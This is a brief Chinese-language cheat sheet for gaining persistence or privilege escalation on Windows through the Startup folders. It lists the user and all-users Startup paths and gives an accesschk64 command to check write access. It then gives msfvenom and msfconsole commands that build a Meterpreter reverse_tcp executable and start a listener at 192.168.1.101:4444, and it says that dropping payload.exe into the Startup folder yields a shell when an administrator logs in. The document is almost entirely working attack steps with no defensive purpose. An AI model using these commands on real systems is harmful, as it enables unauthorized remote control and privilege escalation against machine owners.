自启文件夹
单用户的自启文件夹
| C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
所有用户的自启文件夹
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
|
查看权限
| C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
---
|
生成攻击载荷
| msfconsole
handler -H 192.168.1.101 -P 4444 -p windows/x64/meterpreter/reverse_tcp
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o payload.exe
|
将payload.exe放在startup文件夹下,当管理员登陆,即可获得shell。